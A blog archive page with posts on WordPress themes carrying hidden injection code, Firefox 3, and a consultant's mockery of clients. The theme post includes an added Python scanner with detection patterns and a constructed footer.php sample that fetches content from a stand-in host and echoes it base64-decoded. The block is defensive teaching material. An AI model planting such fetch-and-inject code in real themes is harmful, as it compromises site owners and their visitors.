web development
A cautionary tale regarding theme download sites
Via GigaOM:
Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted....
...There are lots of reasons a hacker may want to inject code into a page:
- To infect visitors by exploiting a browser vulnerability
- To place ads they can then get revenue from
- To embed links to blogs they own, improving their page rank
- To entice people to click on links that lead them elsewhere
The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly.
It's all too easy to compromise a website's security via the theming layer. Malice is just one possibility. There are also hacks and vulnerable code gimmicks pursued by amateur theme developers who just don't know better. It's not just a WordPress thing -- it's all websites, whether built on open source or proprietary platforms (though not static HTML sites, which presumably are as safe as their servers).
In this context, the question for the website owner is whether you want to buy a theme (or download a free one) from an un-vetted vendor. Sure, if you are an adept coder, and/or know the proper API calls to protect your site from things like XSS, you can just clean that up and enjoy the design that attracted you in the first place. But if you don't know those vulnerabilities, you could be opening your site up to ill-will or novice mistakes. Caveat emptor. Don't end up like Deep Jive. Ouch.
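A defensive check for the theme-layer problem described above, as an added example that is not part of the original post, of GigaOM's article or of WordPress itself: a small Python scanner that flags theme PHP files containing remote fetches, decoding functions, dynamic evaluation or hex-escaped strings, run here over a constructed footer.php that behaves like the hidden-code themes GigaOM describes (fetch on every load, print whatever comes back, stay quiet otherwise). The URL, file names and patterns are assumptions.

```python
import re
from pathlib import Path

# Heuristic patterns (constructed, tune for your own code base) for the kind of
# hidden theme code described above: fetch something remote on every page load,
# decode it, and print or eval it into the page.
SUSPICIOUS = {
    "remote_fetch": re.compile(
        r"\b(file_get_contents|curl_init|fopen|fsockopen)\s*\(\s*['\"]https?://", re.I),
    "obfuscation": re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "dynamic_eval": re.compile(
        r"\b(eval|assert|create_function)\s*\(", re.I),
    "hex_escaped_string": re.compile(r"(?:\\x[0-9a-f]{2}){4,}", re.I),
}

def scan_source(src, name="<inline>"):
    """Return (file, line number, pattern label, excerpt) for every hit."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for label, pat in SUSPICIOUS.items():
            if pat.search(line):
                findings.append((name, lineno, label, line.strip()[:80]))
    return findings

def scan_theme(theme_dir):
    """Scan every .php file under a theme directory (e.g. wp-content/themes/foo)."""
    findings = []
    for path in sorted(Path(theme_dir).rglob("*.php")):
        findings.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return findings

# Constructed sample of the behaviour GigaOM describes: pull content from a
# remote host on each load and echo it if anything came back, else stay quiet.
SAMPLE_FOOTER = """<?php
// footer.php (constructed sample, not a real theme)
$r = @file_get_contents("http://example.invalid/feed.txt");
if ($r) { echo base64_decode($r); }
wp_footer();
?>"""

# A benign footer for comparison: only WordPress template calls, no remote fetch.
CLEAN_FOOTER = """<?php
wp_footer();
echo esc_html(get_bloginfo("name"));
?>"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_FOOTER, "footer.php"):
        print("%s:%d [%s] %s" % f)
```

Hits are a starting point for manual review, not proof of compromise: legitimate plugins also call base64_decode, so read the flagged lines in context before deleting anything.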
Firefox 3 making online life much nicer

Today I downloaded and installed Firefox 3 Beta 4. I could not do it before, but now that the Web Developer tools are updated and Firebug has a 1.1 beta that works in FF3, that's enough for me.
I don't know about you, but on both Macs I use regularly, Firefox 2 was crashing all the time. Last night, while writing a blog post for BlogHer, my browser crashed at least a dozen times. On my Mac Pro, Firefox completely melted down -- twice -- requiring a complete rebuild from the start, manually adding one plug-in at a time. But I had to stick it out because I need those developer tools. I cannot imagine working without Firebug.
The new UI is clean, and seems to take up a bit less space. And so far FF3 is fast. Me likes.
On the frontier, not everyone knows their way around
While I was lying in bed last night, I found myself questioning my post yesterday and the attitudes reflected in Joe the Peacock's mocking of what appears to be a rather clueless potential client.
He seems to have struck a nerve, judging by Joe's forums:
Yes let us hear the douchebag please!
I think Joe's got to have at least a little bit of masochist in him to be a consultant, especially an Internet consultant. Sir Geek and I did it for several years and listening to the clients blather on about what they think they want/need is enough to make your brain explode.
Freaking hysterical.
Okay, at first reading of Joe's rant, I confess I did laugh a little. It certainly was outrageous enough to inspire me to post a link.
But to publicly share such mean-spirited attitudes towards potential clients strikes me as rather sad, and what I would consider unprofessional. Now maybe the person on the other end of the line was a jerk. I certainly have encountered my share of jerks.
But Joe mocks this "potential client" for his (?) ignorance.
We in web and software development live in a world that is scarcely understood by most of the people who use what we produce. That's all the more true in the corner of that world where I spend my time: open source, which is a community-of-a-commons concept that seems to elude even the majority of folks in Silicon Valley (who are much more attached to that other source, "outsource"). Quite often we are in the business of educating and enlightening the client, sometimes seemingly as much as we are developing for the client. It comes with the territory. After all, clients come to us, in large part, because we are knowledgeable in things which they are not.
Hello?
Jerks have what's coming to them, imho. But calling someone a "dipshit" for simple ignorance? That's ignorance.
I suppose it's natural that such cynical attitudes will bleed into all areas of business, even this "new economy" we're all a part of that's supposed to, you know, change (read: "improve") the way business is conducted in the world. People are people, and cynical contempt is all-too-common a human attitude. Just don't count me among its willing practitioners.
Then again, Joe is a writer so maybe it's all just fiction. If so, never mind. I'll just walk slowly away from the computer and sit down for another viewing of Office Space.
This is almost too sad to be funny
An unordered list of thoughts I had during a conference call with a potential client today. Dear dear!
[Update: I posted some more thoughts here.]